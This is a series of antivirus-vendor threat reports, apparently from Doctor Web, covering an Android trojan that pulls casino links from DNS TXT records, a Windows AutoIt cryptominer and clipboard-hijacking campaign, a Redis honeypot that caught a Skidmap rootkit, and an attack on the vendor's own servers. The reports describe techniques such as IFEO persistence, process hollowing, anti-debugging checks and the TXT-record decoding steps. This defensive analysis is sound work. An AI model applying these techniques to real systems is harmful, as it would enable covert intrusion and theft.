Задачей многих троянов Android.FakeApp является переход по ссылкам на различные сайты, и с технической точки зрения такие вредоносные программы довольно примитивны. При запуске они получают команду на открытие заданного веб-адреса, в результате чего установившие их пользователи вместо ожидаемой программы или игры видят на экранах своих устройств содержимое нежелательного сайта. Однако иногда среди таких подделок все же встречаются примечательные образцы — такие как Android.FakeApp.1669. От большинства подобных угроз он отличается использованием модифицированной библиотеки dnsjava, с помощью которой получает конфигурацию с вредоносного DNS-сервера, содержащую целевую ссылку. При этом такая конфигурация поступает ему только при подключении к интернету через определенных провайдеров — например, мобильного интернета. В иных же случаях троян никак себя не проявляет.

Android.FakeApp.1669 представлен большим числом модификаций, которые под видом тех или иных приложений распространяются в том числе через каталог Google Play. Так, известные в настоящий момент варианты трояна были загружены из официального электронного магазина ОС Android по меньшей мере 2 160 000 раз.

Примеры программ, в которых скрывался Android.FakeApp.1669

Ниже перечислены варианты Android.FakeApp.1669, которые вирусные аналитики «Доктор Веб» выявили в Google Play. Наши специалисты обнаружили больше троянских программ, но часть из них в этом магазине приложений уже отсутствует.

Название приложения	Число загрузок
Split it: Checks and Tips	1 000 000+
FlashPage parser	500 000+
BeYummy - your cookbook	100 000+
Memogen	100 000+
Display Moving Message	100 000+
WordCount	100 000+
Goal Achievement Planner	100 000+
DualText Compare	100 000+
Travel Memo	100 000+ (удалена)
DessertDreams Recipes	50 000+
Score Time	10 000+

При запуске Android.FakeApp.1669 выполняет DNS-запрос к управляющему серверу для получения TXT-записи, ассоциированной с именем целевого домена. В свою очередь, сервер отдает эту запись трояну, только если зараженное устройство подключено к Сети через целевых провайдеров, среди которых — провайдеры мобильного интернета. Такие TXT-записи обычно содержат сведения о домене и некоторую другую техническую информацию, однако в случае с Android.FakeApp.1669 в ней находится закодированная конфигурация для вредоносной программы.

Для отправки DNS-запросов Android.FakeApp.1669 использует модифицированный код Open Source-библиотеки dnsjava.

Все модификации трояна привязаны к конкретным доменным именам, что позволяет DNS-серверу передавать каждой из них свою конфигурацию. Более того, имена субдоменов целевых доменов уникальны для каждого зараженного устройства. В них закодированы данные об устройстве, в том числе чувствительные:

модель и бренд устройства;
размеры экрана;
идентификатор (состоит из двух чисел: первое — время установки троянского приложения, второе — случайное число);
заряжается ли батарея и каков текущий процент ее заряда;
включены ли настройки разработчика.

Например, вариант Android.FakeApp.1669, который скрывается в приложении Goal Achievement Planner, при анализе запросил у сервера TXT-запись для домена 3gEBkayjVYcMiztlrcJXHFSABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]simpalm[.]com., вариант из программы Split it: Checks and Tips — запись для домена 3gEBkayjVYcMiztlrcJXHFTABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]revolt[.]digital., а вариант из DessertDreams Recipes — для домена 3gEBkayjVYcMiztlrcJXHFWABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]outorigin[.]com..

Пример TXT-записи целевого домена, которую DNS-сервер отдал при запросе через Linux-утилиту dig при анализе одной из модификаций Android.FakeApp.1669

Для расшифровки содержимого этих TXT-записей необходимо выполнить следующие шаги:

перевернуть строку;
декодировать Base64;
разжать gzip;
разбить на строки по символу ÷.

В результате получатся данные следующего вида (пример ниже относится к TXT-записи для приложения Goal Achievement Planner):

url
hxxps[:]//goalachievplan[.]pro
af_id
DF3DgrCPUNxkkx7eiStQ6E
os_id
f109ec36-c6a8-481c-a8ff-3ac6b6131954

В них содержится ссылка, которую троян загружает в WebView внутри своего окна поверх основного интерфейса. Эта ссылка ведет на сайт, запускающий длинную цепочку перенаправлений, в конце которой оказывается сайт онлайн-казино. В результате Android.FakeApp.1669 фактически превращается в веб-приложение, которое демонстрирует содержимое загруженного веб-сайта, а не ту функциональность, которая заявлена на странице приложения в Google Play.

Вредоносная программа вместо ожидаемой функциональности отобразила содержимое загруженного сайта онлайн-казино

В то же время, когда трояну доступно интернет-соединение не через целевых поставщиков (а также в офлайн-режиме), он работает как обещанная программа — при условии, если создатели той или иной модификации предусмотрели какую-либо функциональность на такой случай.

Троян не получил конфигурацию от управляющего сервера и запустился как обычная программа

Dr.Web Security Space для мобильных устройств успешно детектирует и удаляет все известные модификации Android.FakeApp.1669, поэтому для наших пользователей этот троян опасности не представляет.

Индикаторы компрометации

Подробнее об Android.FakeApp.1669

В ходе кампании по распространению трояна для добычи и кражи криптовалюты пострадали более 28 тысяч пользователей

Tue, 08 Oct 2024 13:41:50 GMT

8 октября 2024 года

Вирусные аналитики компании «Доктор Веб» выявили идущую масштабную кампанию по распространению вредоносного ПО для добычи и кражи криптовалюты, в рамках которой трояны доставлялись на машины жертв под видом офисных программ, читов для игр и ботов для онлайн-трейдинга.

В ходе рутинного анализа облачной телеметрии, поступающей от наших пользователей, специалисты вирусной лаборатории Доктор Веб выявили подозрительную активность программы, замаскированной под компонент ОС Windows (StartMenuExperienceHost.exe, легитимный процесс с таким именем отвечает за управление меню Пуск). Эта программа связывалась с удаленным сетевым узлом и ждала подключения извне для того, чтобы сразу же запустить интерпретатор командной строки cmd.exe.

Замаскированной под системный компонент была сетевая утилита Ncat, которая используется в правомерных целях для передачи данных по сети посредством командной строки. Именно эта находка помогла восстановить последовательность событий безопасности, среди которых были попытки заражения компьютеров вредоносным ПО, предотвращенные антивирусом Dr.Web.

Источником заражения являются мошеннические сайты, которые злоумышленники создают на платформе GitHub (оговоримся, что такая деятельность запрещена правилами платформы), и запуск скачанных оттуда программ. Альтернативно, ссылки на вредоносное ПО могут быть закреплены в описаниях под видео на хостинге Youtube. При клике по ссылке скачивается самораспаковывающийся зашифрованный архив, защищенный паролем, что предотвращает его автоматическое сканирование антивирусами. После ввода пароля, который хакеры указывают на странице скачивания, на компьютере жертвы в папку %ALLUSERSPROFILE%\jedist распаковывается следующий набор временных файлов:

UnRar.exe — распаковщик архивов RAR;
WaR.rar — архив RAR;
Iun.bat — сценарий, который создает задачу на выполнение скрипта Uun.bat, инициирует перезагрузку компьютера и удаляет себя;
Uun.bat — обфусцированный скрипт, который распаковывает файл WaR.rar, запускает находящиеся в нем файлы ShellExt.dll и UTShellExt.dll, после чего удаляет задачу, созданную Iun.bat и папку jedist вместе с ее содержимым.

Файл ShellExt.dll представляет собой интерпретатор языка AutoIt и сам по себе не является вредоносным. Однако, это не его настоящее имя. Злоумышленники переименовали исходный файл с именем AutoIt3.exe в ShellExt.dll для маскировки под библиотеку программы WinRAR, которая отвечает за интеграцию функций архиватора в контекстное меню Windows. После своего запуска интерпретатор в свою очередь загружает файл UTShellExt.dll, который был позаимствован мошенниками у утилиты Uninstall Tool. К этой библиотеке, подписанной действительной цифровой подписью, они «пришили» вредоносный AutoIt скрипт. После его выполнения происходит распаковка полезной нагрузки, все файлы которой сильно обфусцированы.

Язык AutoIt является языком программирования для создания скриптов автоматизации и утилит для ОС Windows. Простота освоения и широкая функциональность сделали его популярным среди разных категорий пользователей, в том числе и вирусописателей. Некоторые антивирусные программы детектируют любой скомпилированный скрипт AutoIt как вредоносный.

Файл UTShellExt.dll выполняет следующие действия:

Ищет запущенное отладочное ПО в списке процессов. В скрипте содержатся названия примерно 50 различных утилит, используемых для отладки, и при выявлении хотя бы одного процесса из этого списка, скрипт завершает свою работу
Если отладочное ПО не найдено, в скомпрометированную систему распаковываются файлы, необходимые для продолжения атаки. Часть файлов является «чистой», они необходимы для реализации сетевого взаимодействия, а остальные выполняют вредоносные действия
Создает системные события для обеспечения сетевого доступа с помощью Ncat и загрузки BAT и DLL файлов, а также вносит изменения в реестр для реализации перехвата запуска приложений с использованием техники IFEO
IFEO (Image File Execution Options) — это возможности, предоставляемые ОС Windows для разработчиков ПО, например, автоматический запуск отладчика при старте приложения. Однако злоумышленники могут использовать техники IFEO для закрепления в системе. Для этого они меняют путь до отладчика, указывая вместо него путь до вредоносного файла, таким образом, при каждом запуске легитимного приложения будет также запускаться и вредоносное. В этом случае хакеры «цеплялись» к системным службам ОС Windows, а также к процессам обновления браузеров Google Chrome и Microsoft Edge (MoUsoCoreWorker.exe, svchost.exe, TrustedInstaller.exe, GoogleUpdate.exe и MicrosoftEdgeUpdate.exe).
Запрещает доступ к удалению, записи и изменения для папок и файлов, созданных на этапе 2
Отключает службу восстановления ОС Windows
Отправляет в Telegram злоумышленникам информацию о технических характеристиках зараженного компьютера, его имя, версию ОС и сведения об установленном антивирусном ПО.

Функции скрытого майнинга и кражи криптовалюты выполняют файлы DeviceId.dll и 7zxa.dll. Оба файла встраиваются в процесс explorer.exe (Проводник ОС Windows), используя технику Process Hollowing. Первый файл представляет собой легитимную библиотеку, распространяемую в составе среды разработки .NET, в которую был встроен вредоносный AutoIt скрипт, запускающий майнер SilentCryptoMiner. Этот майнер обладает широкими возможностями по конфигурации и маскировке процесса добычи криптовалюты, а также функцией удаленного управления.

Библиотека 7zxa.dll, замаскированная под компонент архиватора 7-Zip, является так называемым клиппером. Данный тип вредоносного ПО используется для мониторинга данных в буфере обмена, которые он может или подменять, или пересылать злоумышленникам. В данном случае клиппер отслеживает появление в буфере обмена типовых последовательностей символов, характерных для адресов кошельков, и заменяет их на те, которые были указаны злоумышленниками. К моменту публикации достоверно известно, что только благодаря клипперу хакеры смогли обогатиться на более чем 6000 долларов (или 571 тысячу рублей).

Техника Process Hollowing заключается в запуске какого-либо доверенного процесса в приостановленном состоянии, перезаписи его кода в памяти на вредоносный, а затем возобновлении выполнения процесса. Использование такой техники приводит к появлению одноименных копий процесса, так в нашем случае на компьютерах жертв наблюдалось три процесса explorer.exe, что является подозрительным самим по себе, так как в норме этот процесс существует в единственном экземпляре.

Всего от действий киберпреступников пострадало более 28 тысяч человек, превалирующее большинство из которых являются жителями России. Также, значимые цифры заражений наблюдаются в Беларуси, Узбекистане, Казахстане, Украине, Кыргызстане и Турции. Поскольку компрометация компьютеров жертв происходила при установке пиратских версий популярных программ, то основными рекомендациями по профилактике подобных инцидентов являются скачивание ПО из официальных источников, использование программ-аналогов с открытым исходным кодом, а также использование антивирусов. Пользователи продуктов Dr.Web надежно защищены от данной угрозы.

Подробнее о Trojan.AutoIt.1443

Индикаторы компрометации

Приманка для злоумышленников: сервер с уязвимой версией базы данных Redis позволил выявить новую модификацию руткита для сокрытия процесса добычи криптовалюты

Thu, 03 Oct 2024 03:00:00 GMT

3 октября 2024 года

Вирусные аналитики компании «Доктор Веб» выявили новую модификацию руткита, устанавливающую на скомпрометированные машины с ОС Linux троян-майнер Skidmap. Этот руткит выполнен в виде вредоносного модуля ядра, который скрывает деятельность майнера, подменяя информацию о загрузке процессора и сетевой активности. Данная атака является массовой и направлена преимущественно на корпоративный сектор — крупные серверы и облачные среды, — так как именно с подобными ресурсами эффективность майнинга будет максимальной.

Система управления базами данных Redis является одной из самых популярных в мире: серверы Redis используются такими крупными компаниями как Х (ранее Twitter), AirBnB, Amazon и др. Преимущества системы очевидны: максимальное быстродействие, минимальные требования к ресурсам, поддержка различных типов данных и языков программирования. Однако у данного продукта есть и минусы: поскольку изначальное применение Redis не предполагало его установку на сетевой периферии, в конфигурации по умолчанию поддерживаются только базовые функции обеспечения безопасности, а в версиях до 6.0 отсутствуют механизмы контроля доступа и шифрования. Кроме того, ежегодно в профильных СМИ появляются сообщения о выявлении в Redis уязвимостей. Например, в 2023 году их было зафиксировано 12, три из которых имели статус «Серьезные». Участившиеся сообщения о компрометации серверов с последующей установкой программ для майнинга заинтересовали специалистов вирусной лаборатории «Доктор Веб», у которых возникло желание непосредственно пронаблюдать за данной атакой. Для этого было принято решение запустить свой сервер Redis с отключенной защитой и ждать непрошеных гостей. В течение года ежемесячно на сервер предпринимались от 10 до 14 тысяч атак, а недавно на сервере было обнаружено присутствие вредоносного ПО Skidmap, на что и рассчитывали наши аналитики. Однако неожиданным стало то, что в этом случае киберпреступники воспользовались новым методом сокрытия активности майнера, а заодно установили сразу четыре бэкдора.

Первые сообщения о трояне Skidmap появились в 2019 году. Данный троян-майнер имеет определенную специализацию и встречается в основном в корпоративных сетях, так как наибольшую отдачу от скрытного майнинга можно получить именно в enterprise-сегменте. Несмотря на то, что с момента появления трояна прошло уже пять лет, принцип его работы остается без изменений: он устанавливается в систему посредством эксплуатации уязвимостей или неправильных настроек ПО. В случае нашего сервера-приманки хакеры добавили в системный планировщик cron задачи, в рамках которых каждые 10 минут запускался скрипт, скачивающий дроппер Linux.MulDrop.142 (или другую его модификацию — Linux.MulDrop.143). Данный исполняемый файл проверяет версию ядра ОС, отключает защитный модуль SELinux, а затем распаковывает в системе файлы руткита Linux.Rootkit.400, майнера Linux.BtcMine.815, а также бэкдоров Linux.BackDoor.Pam.8/9, Linux.BackDoor.SSH.425/426 и трояна Linux.BackDoor.RCTL.2 для удаленного доступа. Отличительной чертой дроппера является то, что он имеет довольно большой размер, так как содержит исполняемые файлы под различные дистрибутивы Linux. В данном случае в тело дроппера были вшито примерно 60 файлов для разных версий дистрибутивов Debian и Red Hat Enterprise Linux, которые наиболее часто устанавливаются на серверы.

После установки руткит перехватывает ряд системных вызовов, что позволяет ему выдавать фейковые сведения в ответ на диагностические команды, вводимые администратором. Среди перехватываемых функций встречаются те, которые сообщают о среднем значении загрузки ЦП, сетевой активности на ряде портов и выводят перечень файлов в папках. Руткит также проверяет все загружаемые модули ядра и запрещает запуск тех, которые могут детектировать его присутствие. Всё это позволяет полностью скрывать все аспекты деятельности майнера по добыче криптовалюты: вычисления, отправку хешей и получение заданий.

Назначение устанавливаемых дроппером бэкдоров в рамках этой атаки заключается в сохранении и отправке злоумышленникам данных обо всех SSH-авторизациях, а также создании мастер-пароля ко всем учетным записям в системе. Отметим, что все пароли при отправке дополнительно шифруются шифром Цезаря со смещением в 4 буквы.

Для расширения возможностей по контролю взломанной системы злоумышленники устанавливают RAT-троян Linux.BackDoor.RCTL.2. Он позволяет отправлять команды на скомпрометированный сервер и получать от него любые данные по зашифрованному соединению, которое троян инициирует самостоятельно.

В качестве майнера устанавливается программа xmrig, позволяющая добывать ряд криптовалют, наиболее известной из которых является Monero, снискавшая популярность в даркнете благодаря своей полной анонимности на уровне транзакций. Следует сказать, что обнаружение прикрытого руткитом майнера в кластере серверов является довольно нетривиальной задачей. В отсутствие достоверных сведений о потреблении ресурсов, единственное, что может натолкнуть на мысль о компрометации — это избыточное энергопотребление и повышенное теплообразование. Злоумышленники также могут изменять настройки майнера таким образом, чтобы обеспечить оптимальный баланс между производительностью майнинга и сохранением быстродействия оборудования, что позволит привлекать меньше внимания к скомпрометированной системе.

Эволюция семейства вредоносного ПО Skidmap проявляется в усложнении схемы атаки: запускаемые программы делают вызовы друг к другу, отключают защитные системы, вмешиваются в работу большого числа системных утилит и служб, загружают руткиты и т. д., что значительно затрудняет действия по реагированию на подобные инциденты.

Перечисленные угрозы внесены в вирусную базу Dr.Web и потому не представляют опасности для пользователей наших продуктов.

Индикаторы компрометации

Подробнее о Linux.MulDrop.142

Подробнее о Linux.MulDrop.143

Подробнее о Linux.MulDrop.144

Подробнее о Linux.Rootkit.400

Атака на ресурсы «Доктор Веб» отражена. Обновление вирусных баз возобновлено

Tue, 17 Sep 2024 17:00:54 GMT

17 сентября 2024 года

Ситуация с атакой на ресурсы "Доктор Веб" успешно разрешена, и мы делимся оперативными новостями и хронологией событий.

Атака на наши ресурсы началась в субботу 14 сентября 2024 года. Мы внимательно за ней наблюдали и держали происходящее под контролем.

16 сентября 2024 года наша компания зафиксировала признаки внешнего неправомерного воздействия на IT-инфраструктуру.

Согласно действующим протоколам безопасности мы оперативно отключили серверы и запустили процесс всесторонней диагностики. Для анализа и устранения последствий инцидента был использован комплекс мер, включавший использование сервиса Dr.Web FixIt! для Linux. На основании полученных данных мы успешно локализовали угрозу и убедились, что она не затронула клиентов компании.

16 сентября, 09:30. В рамках соблюдения протоколов безопасности часть ресурсов компании временно отключена от сети для проведения дополнительной проверки. В связи с этим приостановлен выпуск обновлений вирусных баз Dr.Web.

17 сентября, 16:20. Обновление вирусных баз Dr.Web возобновлено в полном объеме. Никто из пользователей Dr.Web не пострадал.

Мы продолжаем следовать самым высоким стандартам безопасности и оперативно принимаем меры для восстановления стабильной работы всех систем.